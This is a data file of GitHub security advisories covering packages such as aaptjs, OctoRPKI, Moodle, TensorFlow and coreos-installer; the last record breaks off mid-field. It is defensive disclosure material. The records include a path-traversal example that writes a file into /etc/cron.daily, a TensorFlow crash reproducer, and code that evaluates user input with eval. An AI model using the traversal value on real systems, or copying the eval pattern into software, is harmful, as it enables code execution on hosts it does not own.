+1.4.0,GHSA-m7p2-ghfh-pjvx,2022-05-04T03:44:50Z,2021-11-01T19:18:51Z,,['CVE-2020-36380'],Vulnerability in crunch function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the crunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36380'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T18:53:19Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}"
+1.4.0,GHSA-8cvr-4rrf-f244,2021-11-10T18:18:28Z,2021-11-10T20:15:44Z,,['CVE-2021-3909'],Infinite open connection causes OctoRPKI to hang forever,"OctoRPKI does not limit the length of a connection, allowing for a slowloris DOS attack to take place which makes OctoRPKI wait forever. Specifically, the repository that OctoRPKI sends HTTP requests to will keep the connection open for a day before a response is returned, but does keep drip feeding new bytes to keep the connection alive.
+
+## Patches
+
+## For more information
+If you have any questions or comments about this advisory email us at security@cloudflare.com
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki/cmd/octorpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-8cvr-4rrf-f244'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3909'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5033'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:18:28Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}"
+1.4.0,GHSA-cqh2-vc2f-q4fh,2021-11-10T18:16:54Z,2021-11-10T20:08:29Z,,['CVE-2021-3907'],Arbitrary filepath traversal via URI injection ,"OctoRPKI does not escape a URI with a filename containing "".."", this allows a repository to create a file, (ex. `rsync://example.org/repo/../../etc/cron.daily/evil.roa`), which would then be written to disk outside the base cache folder. This could allow for remote code execution on the host machine OctoRPKI is running on.
+
+## Patches
+
+## For more information
+If you have any questions or comments about this advisory email us at security@cloudflare.com
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cloudflare/cfrpki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-3jhm-87m6-x959'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-cqh2-vc2f-q4fh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3907'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/cfrpki/commit/eb9cc4db7b7b79e44f56dfaa959fccdfb2af8284'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/cfrpki'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0248'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5033'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5041'}]","{'cwe_ids': ['CWE-20', 'CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:16:54Z', 'nvd_published_at': '2021-11-11T22:15:00Z'}"
+1.4.0,GHSA-vhrp-8qx4-vr6c,2023-08-08T19:59:04Z,2021-11-19T20:18:20Z,,['CVE-2021-43996'],Incorrect Access Control in Ignition,"The Ignition component before 1.16.15, and 2.0.x before 2.0.6, for Laravel has a ""fix variable names"" feature that can lead to incorrect access control.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'facade/ignition'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.15'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'facade/ignition'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43996'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/pull/285'}, {'type': 'PACKAGE', 'url': 'https://github.com/facade/ignition'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/compare/1.16.14...1.16.15'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/compare/2.0.5...2.0.6'}]","{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-18T21:07:26Z', 'nvd_published_at': '2021-11-17T20:15:00Z'}"
+1.4.0,GHSA-wpfp-q843-v772,2022-06-17T01:13:12Z,2021-11-23T00:00:51Z,,['CVE-2021-43558'],Cross-site Scripting in moodle,"A flaw was found in Moodle in versions 3.11 to 3.11.3, 3.10 to 3.10.7, 3.9 to 3.9.10 and earlier unsupported versions. A URL parameter in the filetype site administrator tool required extra sanitizing to prevent a reflected XSS risk.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.10.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43558'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2021515'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=429097'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2022-06-17T01:13:12Z', 'nvd_published_at': '2021-11-22T16:15:00Z'}"
+1.4.0,GHSA-f99g-pg48-wrfc,2021-11-17T21:13:01Z,2021-11-15T23:19:26Z,,['CVE-2021-3932'],twill is vulnerable to Cross-Site Request Forgery (CSRF),twill is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'area17/twill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'area17/twill'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3932'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/commit/5cded9fc'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/commit/81d80d1fbbdd8bb73c020f03c623fd4487bd9b78'}, {'type': 'PACKAGE', 'url': 'https://github.com/area17/twill'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/commits/bab94c1e'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/releases/tag/1.2.5'}, {'type': 'WEB', 'url': 'https://github.com/area17/twill/releases/tag/2.5.3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6ef21e34-f6d9-445a-b657-375c53dc2b43'}]","{'cwe_ids': ['CWE-268', 'CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T21:56:41Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}"
+1.4.0,GHSA-8jhp-2gcr-qw96,2023-07-11T18:17:30Z,2021-11-23T00:00:51Z,,['CVE-2021-3943'],Moodle vulnerable to RCE via unsafe deserialization,"A flaw was found in Moodle in versions 3.11 to 3.11.3, 3.10 to 3.10.7, 3.9 to 3.9.10 and earlier unsupported versions. A remote code execution risk when restoring backup files was identified.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11'}, {'fixed': '3.11.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.11.3'}}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10'}, {'fixed': '3.10.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.10.7'}}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9'}, {'fixed': '3.9.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.9.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3943'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/58e8ad852f9e75c8158e5bee02c273383f7d9865'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2021963'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=429095'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T18:17:30Z', 'nvd_published_at': '2021-11-22T16:15:00Z'}"
+1.4.0,GHSA-7v94-64hj-m82h,2021-11-08T22:39:54Z,2021-11-10T19:02:57Z,,['CVE-2021-41207'],FPE in `ParallelConcat`,"### Impact
+The [implementation of `ParallelConcat`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/inplace_ops.cc#L72-L97) misses some input validation and can produce a division by 0:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def test():
+ y = tf.raw_ops.ParallelConcat(values=[['tf']],shape=0)
+ return y
+
+test()
+```
+
+### Patches
+We have patched the issue in GitHub commit [f2c3931113eaafe9ef558faaddd48e00a6606235](https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7v94-64hj-m82h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41207'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:39:54Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}"
+1.4.0,GHSA-qppg-v75c-r5ff,2023-08-31T00:42:34Z,2021-11-30T22:21:36Z,,['CVE-2021-32061'],S3Scanner allows Directory Traversal,"S3Scanner before 2.0.2 allows Directory Traversal via a crafted bucket, as demonstrated by a `../` substring in a `ListBucketResult` element.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 's3scanner'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32061'}, {'type': 'WEB', 'url': 'https://github.com/sa7mon/S3Scanner/issues/122'}, {'type': 'WEB', 'url': 'https://github.com/sa7mon/S3Scanner/commit/fafa30a3bd35b496b3f7db9bfc35b75a8a06bcd1'}, {'type': 'PACKAGE', 'url': 'https://github.com/sa7mon/S3Scanner/'}, {'type': 'WEB', 'url': 'https://github.com/sa7mon/S3Scanner/releases/tag/2.0.2'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/62'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T16:20:13Z', 'nvd_published_at': '2021-11-29T03:15:00Z'}"
+1.4.0,GHSA-6rvj-pw9w-jcvc,2021-10-13T17:27:56Z,2021-11-19T20:39:35Z,,['CVE-2021-41867'],Information disclosure vulnerability in OnionShare,An information disclosure vulnerability in OnionShare 2.3 before 2.4 allows remote unauthenticated attackers to retrieve the full list of participants of a non-public OnionShare node via the --chat feature. ,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'onionshare-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3'}, {'fixed': '2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41867'}, {'type': 'PACKAGE', 'url': 'https://github.com/onionshare/onionshare'}, {'type': 'WEB', 'url': 'https://github.com/onionshare/onionshare/compare/v2.3.3...v2.4'}, {'type': 'WEB', 'url': 'https://www.ihteam.net/advisory/onionshare/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T15:16:30Z', 'nvd_published_at': '2021-10-04T14:15:00Z'}"
+1.4.0,GHSA-35m5-8cvj-8783,2021-11-08T18:58:04Z,2021-11-10T16:28:46Z,,['CVE-2021-39182'],Improper hashing in enrocrypt,"### Impact
+The vulnerability is we used MD5 hashing Algorithm In our hashing file. If anyone who is a beginner(and doesn't know about hashes) can face problems as MD5 is considered a Insecure Hashing Algorithm.
+
+### Patches
+The vulnerability is patched in v1.1.4 of the product, the users can upgrade to version 1.1.4.
+
+### Workarounds
+If u specifically want a version and don't want to upgrade, you can remove the `MD5` hashing function from the file `hashing.py` and this vulnerability will be gone
+
+### References
+https://www.cybersecurity-help.cz/vdb/cwe/916/
+https://www.cybersecurity-help.cz/vdb/cwe/327/
+https://www.cybersecurity-help.cz/vdb/cwe/328/
+https://www.section.io/engineering-education/what-is-md5/
+https://www.johndcook.com/blog/2019/01/24/reversing-an-md5-hash/
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [**Enrocrypt's Official Repo**](http://www.github.com/Morgan-Phoenix/EnroCrypt)
+* Create a Discussion in [**Enrocrypt's Official Repo**](http://www.github.com/Morgan-Phoenix/EnroCrypt)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'enrocrypt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Morgan-Phoenix/EnroCrypt/security/advisories/GHSA-35m5-8cvj-8783'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39182'}, {'type': 'WEB', 'url': 'https://github.com/Morgan-Phoenix/EnroCrypt/commit/e652d56ac60eadfc26489ab83927af13a9b9d8ce'}, {'type': 'PACKAGE', 'url': 'https://github.com/Morgan-Phoenix/EnroCrypt'}]","{'cwe_ids': ['CWE-326', 'CWE-327', 'CWE-328', 'CWE-916'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T18:58:04Z', 'nvd_published_at': '2021-11-08T15:15:00Z'}"
+1.4.0,GHSA-8gwj-8hxc-285w,2021-11-08T17:43:16Z,2021-11-08T17:43:27Z,,['CVE-2021-23509'],Prototype Pollution in json-ptr,This affects the package `json-ptr` before `3.0.0`. A type confusion vulnerability can lead to a bypass of CVE-2020-7766 when the user-provided keys used in the pointer parameter are arrays.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-ptr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23509'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr/pull/42'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr/commit/5dc458fbad1c382a2e3ca6d62e66ede3d92849ca'}, {'type': 'PACKAGE', 'url': 'https://github.com/flitbit/json-ptr'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr%23security-vulnerabilities-resolved'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPTR-1577291'}]","{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:56:49Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}"
+1.4.0,GHSA-w6v7-w58j-pg5r,2021-11-15T14:59:59Z,2021-11-15T17:40:51Z,,['CVE-2021-41038'],Improper Verification of Communication Channel in @theia/plugin-ext,"In versions of the @theia/plugin-ext component of Eclipse Theia prior to 1.18.0, Webview contents can be hijacked via postMessage().","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@theia/plugin-ext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41038'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/pull/10125'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=575924'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-theia/theia'}]","{'cwe_ids': ['CWE-940'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T19:46:56Z', 'nvd_published_at': '2021-11-10T17:15:00Z'}"
+1.4.0,GHSA-46rx-6jg9-4fh8,2021-11-08T17:58:59Z,2021-11-08T17:59:15Z,,['CVE-2021-43324'],Cross-site Scripting in LibreNMS,LibreNMS through 21.10.2 allows XSS via a widget title.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.11.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 21.10.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43324'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/commit/99d2462b80435b91a35236639b909eebee432126'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:03:09Z', 'nvd_published_at': '2021-11-03T15:15:00Z'}"
+1.4.0,GHSA-4qwq-q4pr-rr7r,2022-05-04T03:45:26Z,2021-11-02T15:42:38Z,,['CVE-2020-36378'],Vulnerability in packageCmd function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the packageCmd function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36378'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:24:18Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}"
+1.4.0,GHSA-3rcw-9p9x-582v,2022-10-21T13:05:05Z,2021-11-10T16:54:02Z,,['CVE-2021-41228'],Code injection in `saved_model_cli`,"### Impact
+TensorFlow's `saved_model_cli` tool is vulnerable to a code injection as it [calls `eval` on user supplied strings](https://github.com/tensorflow/tensorflow/blob/87462bfac761435a46641ff2f10ad0b6e5414a4b/tensorflow/python/tools/saved_model_cli.py#L524-L550)
+
+```python
+def preprocess_input_exprs_arg_string(input_exprs_str):
+ ...
+ for input_raw in filter(bool, input_exprs_str.split(';')):
+ ...
+ input_key, expr = input_raw.split('=', 1)
+ input_dict[input_key] = eval(expr)
+ ...
+```
+
+This can be used by attackers to run arbitrary code on the plaform where the CLI tool runs.
+However, given that the tool is always run manually, the impact of this is not severe. We have patched this by adding a `safe` flag which defaults to `True` and an explicit warning for users.
+
+### Patches
+We have patched the issue in GitHub commit [8b202f08d52e8206af2bdb2112a62fafbc546ec7](https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by Omer Kaspi from Vdoo.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3rcw-9p9x-582v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41228'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8b202f08d52e8206af2bdb2112a62fafbc546ec7'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:43:17Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-862g-9h5m-m3qv,2022-09-08T14:25:48Z,2021-11-08T18:01:13Z,,['CVE-2021-3917'],coreos-installer < 0.10.0 writes world-readable Ignition config to installed system,"### Impact
+On systems installed with coreos-installer before 0.10.0, the user-provided Ignition config was written to `/boot/ignition/config.ign` with world-readable permissions, granting unprivileged users access to any secrets included in the config.
+
+Default configurations of Fedora CoreOS and RHEL CoreOS do not include any unprivileged user accounts. In addition, instances launched from a cloud image, and systems provisioned with the `ignition.config.url` kernel argument, do not use the `config.ign` file and are unaffected.
+
+### Patches
+coreos-installer 0.10.0 and later [writes](https://github.com/coreos/coreos-installer/pull/571) the Ignition config with restricted permissions.
+
+### Workarounds
+
+On Fedora CoreOS systems installed from version 34.20210711.3.0 (stable), 34.20210711.2.0 (testing), 34.20210711.1.1 (next) and later, the `/boot/ignition` directory and its contents are removed after provisioning is complete. All Fedora CoreOS systems that have updated to these versions or later have automatically removed the `/boot/ignition` directory and no action is required.
+
+On other systems, `/boot/ignition/config.ign` can be removed manually, as it is not used after provisioning is complete:
+
+```
+sudo mount -o remount,rw /boot
+sudo rm -rf /boot/ignition
+```
+
+### References
+For more information, see https://github.com/coreos/fedora-coreos-tracker/issues/889.
+
+### For more information
+If you have any questions or comments about this advisory, [open an issue in coreos-installer](https://github.com/coreos/coreos-installer/issues/new/choose) or email the CoreOS [development mailing list](https://lists.fedoraproject.org/archives/list/coreos@lists.fedoraproject.org/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'coreos-installer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/security/advisories/GHSA-862g-9h5m-m3qv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3917'}, {'type': 'WEB', 'url': 'https://github.com/coreos/fedora-coreos-tracker/issues/889'}, {'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/commit/2a36405339c87b16ed6c76e91ad5b76638fbdb0c'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2021-3917'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2018478'}, {'type': 'PACKAGE', 'url': 'https://github.com/coreos/coreos-installer/'}, {'type': 'WEB', 'url': 